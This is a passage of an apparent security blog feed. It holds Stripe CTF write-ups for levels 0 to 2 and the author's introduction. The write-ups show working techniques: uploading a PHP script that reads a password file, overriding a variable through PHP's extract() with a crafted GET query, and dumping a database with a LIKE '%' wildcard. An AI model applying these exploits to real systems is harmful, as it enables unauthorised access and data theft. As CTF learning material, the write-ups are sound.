&lt;img alt="level02-uploaded-picture.png" class="align-center" src="/images/stripe-ctf-level-2/level02-uploaded-picture.png" /&gt;
&lt;p&gt;But if you look at the code, you can see that no check is performed on
the file you upload. Which means you can upload &lt;strong&gt;any&lt;/strong&gt; file, not just a
picture.&lt;/p&gt;
&lt;p&gt;You also know where your &amp;quot;picture&amp;quot; is stored: uploads/your_file. So we
can upload a PHP script that'll open the password file, and visit the
URL where it's located to execute it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="nv"&gt;$content&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;file_get_contents&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;../password.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$content&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;&lt;span class="x"&gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's name this file exploit.php. We upload it:&lt;/p&gt;
&lt;img alt="level02-uploaded-script.png" class="align-center" src="/images/stripe-ctf-level-2/level02-uploaded-script.png" /&gt;
&lt;p&gt;We can see that no image is displayed (because your browser can't
display the script as an image), yet the server says it was successfully
uploaded. Now, we just have to go to upoads/exploit.php, and &lt;strong&gt;bam!&lt;/strong&gt;
you have the password for this level.&lt;/p&gt;
&lt;img alt="level02-executing-script.png" class="align-center" src="/images/stripe-ctf-level-2/level02-executing-script.png" /&gt;
&lt;p&gt;w00t!&lt;/p&gt;
</content></entry><entry><title>Stripe CTF: Level #1</title><link href="https://allyourbase.utouch.fr/posts/2012/10/13/stripe-ctf-level-1/" rel="alternate"></link><published>2012-10-13T15:52:00+02:00</published><updated>2012-10-13T15:52:00+02:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2012-10-13:/posts/2012/10/13/stripe-ctf-level-1/</id><summary type="html">&lt;img alt="level01-logo.jpg" class="align-center" src="/images/stripe-ctf-level-1/level01-logo.jpg" /&gt;
&lt;p&gt;You can find the code of this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-1/level01-code.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256: &lt;code&gt;b67c313a1a3bebd8702159efae32f95f1b41885f6e00103ee53e896a53194f43&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;So, this level wants you to guess a password, stored in a file named
&amp;quot;secret-combination.txt&amp;quot; on the server. If you manage to do it, it'll
give you the password for this level. Let's take a look at the …&lt;/p&gt;</summary><content type="html">&lt;img alt="level01-logo.jpg" class="align-center" src="/images/stripe-ctf-level-1/level01-logo.jpg" /&gt;
&lt;p&gt;You can find the code of this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-1/level01-code.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256: &lt;code&gt;b67c313a1a3bebd8702159efae32f95f1b41885f6e00103ee53e896a53194f43&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;So, this level wants you to guess a password, stored in a file named
&amp;quot;secret-combination.txt&amp;quot; on the server. If you manage to do it, it'll
give you the password for this level. Let's take a look at the code and
see how to get the password without knowing the combination.&lt;/p&gt;
&lt;p&gt;The server starts by defining a variable &lt;code&gt;$filename&lt;/code&gt; equal
to &amp;quot;secret-combination.txt&amp;quot;. That's the file of the combination (I'm so
deductive). It then retrieves your attempt (which was passed by &lt;code&gt;GET&lt;/code&gt;),
and compares it to the content of the file. If they're the same, the
server will gives you the sweet, sweet password. Otherwise, tough.&lt;/p&gt;
&lt;img alt="level01-failed-attempt.png" class="align-center" src="/images/stripe-ctf-level-1/level01-failed-attempt.png" /&gt;
&lt;p&gt;The thing is, the server doesn't retrieve your attempt using
&lt;code&gt;$_GET['attempt']&lt;/code&gt;. It uses the &lt;a class="reference external" href="http://php.net/manual/en/function.extract.php"&gt;extract PHP
function&lt;/a&gt; on the
&lt;code&gt;$_GET&lt;/code&gt; array. Basically, for every entry &lt;code&gt;$_GET['key'] = value&lt;/code&gt;,
it’ll create a variable &lt;code&gt;$key&lt;/code&gt; with the value
&lt;code&gt;value&lt;/code&gt;. It means that if we give a parameter filename in the
&lt;code&gt;GET&lt;/code&gt; request, we can override the variable &lt;code&gt;$filename&lt;/code&gt;, and open
any file. So let's open a non-existing file, and give an empty guess:
&lt;code&gt;?attempt=&amp;amp;filename=dummy-filename.txt&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This request will set &lt;code&gt;$filename&lt;/code&gt; to &amp;quot;dummy-filename.txt&amp;quot;, so
that when the server tries to retrieve its content, it'll yield an empty
string. Since our attempt is empty, it will match, and the server will
give us the password for this level.&lt;/p&gt;
&lt;img alt="level01-success-attempt.png" class="align-center" src="/images/stripe-ctf-level-1/level01-success-attempt.png" /&gt;
&lt;p&gt;w00t!&lt;/p&gt;
</content></entry><entry><title>Stripe CTF: Level #0</title><link href="https://allyourbase.utouch.fr/posts/2012/10/13/stripe-ctf-level-0/" rel="alternate"></link><published>2012-10-13T15:41:00+02:00</published><updated>2012-10-13T15:41:00+02:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2012-10-13:/posts/2012/10/13/stripe-ctf-level-0/</id><summary type="html">&lt;img alt="level00-logo.png" class="align-center" src="/images/stripe-ctf-level-0/level00-logo.png" /&gt;
&lt;p&gt;You can find the code of this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-0/level00-code.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256: &lt;code&gt;da9712a1851597d6d4b5a90224a1d0fcaa4b558f55a10ca0c7a115d18fe9dcb7&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;So, this level is a safe that keeps your secrets for you. But it also
keeps secrets for other people. Let's find out how we can recover the
password for this level.&lt;/p&gt;
&lt;p&gt;The page is a simple form with …&lt;/p&gt;</summary><content type="html">&lt;img alt="level00-logo.png" class="align-center" src="/images/stripe-ctf-level-0/level00-logo.png" /&gt;
&lt;p&gt;You can find the code of this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-0/level00-code.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256: &lt;code&gt;da9712a1851597d6d4b5a90224a1d0fcaa4b558f55a10ca0c7a115d18fe9dcb7&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;So, this level is a safe that keeps your secrets for you. But it also
keeps secrets for other people. Let's find out how we can recover the
password for this level.&lt;/p&gt;
&lt;p&gt;The page is a simple form with three fields: your key, your secret
and the name of your secret. When you post these values, they are
registered in a database in this format: (key.secret_name, secret).&lt;/p&gt;
&lt;p&gt;The safe gives you the possibility to retrieve your secrets by entering
your key (otherwise, it'd be a stupid safe). Then, it'll do a SQL query
to get every entry which looks like this: (entered_key.anything,
anything). The SQL query is this one:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;secrets&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="k"&gt;key&lt;/span&gt; &lt;span class="k"&gt;LIKE&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="ss"&gt;&amp;quot;.%&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It's a prepared query, used to prevent SQL injection (with quotes and
the like). The ? will be replaced by the value you send to the server.
The &lt;code&gt;LIKE&lt;/code&gt; keyword is used to match a string against a regexp.
The % means &amp;quot;any number of any characters&amp;quot; (kind of like the *).&lt;/p&gt;
&lt;p&gt;The problem with this is that the key you enter is not sanitized. Well,
it's sanitized by the prepared query so that you cannot perform SQL.
But it's not sanitized for the &lt;code&gt;LIKE&lt;/code&gt; syntax. So
let's say you enter % as a key, the query will look like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;secrets&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="k"&gt;key&lt;/span&gt; &lt;span class="k"&gt;LIKE&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="o"&gt;%&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It means &amp;quot;select every secret where the key has the form
'any_characters.any_characters'&amp;quot;. And that's every secret! So the safe
will give you every secret stored, and thus, the password for this
level.&lt;/p&gt;
&lt;p&gt;w00t!&lt;/p&gt;
</content></entry><entry><title>#define AUTHOR Yannick Méheut</title><link href="https://allyourbase.utouch.fr/posts/2012/10/13/define-author-yannick-meheut/" rel="alternate"></link><published>2012-10-13T03:09:00+02:00</published><updated>2012-10-13T03:09:00+02:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2012-10-13:/posts/2012/10/13/define-author-yannick-meheut/</id><summary type="html">&lt;p&gt;Hi everyone!&lt;/p&gt;
&lt;p&gt;My name is Yannick, I'm a 22 year-old student at the French engineer
school Télécom ParisTech. I study cryptography and info/netsec. Although
I find these topics fascinating, I'm pretty new to this world.&lt;/p&gt;
&lt;img alt="yannick.jpg" class="align-center" src="/images/define-author-yannick-meheut/yannick.jpg" /&gt;
&lt;p&gt;Last month, I decided to participate to the Stripe CTF, and,
unexpectedly, I managed …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Hi everyone!&lt;/p&gt;
&lt;p&gt;My name is Yannick, I'm a 22 year-old student at the French engineer
school Télécom ParisTech. I study cryptography and info/netsec. Although
I find these topics fascinating, I'm pretty new to this world.&lt;/p&gt;
&lt;img alt="yannick.jpg" class="align-center" src="/images/define-author-yannick-meheut/yannick.jpg" /&gt;
&lt;p&gt;Last month, I decided to participate to the Stripe CTF, and,
unexpectedly, I managed to capture the flag, yay! I chose to create a
blog to post my write-ups, to leave a trace of my participation, and
later post news from the info/netsec world.&lt;/p&gt;
&lt;p&gt;Hope you have a nice time,&lt;/p&gt;
&lt;p&gt;Cheers.&lt;/p&gt;
</content></entry></feed>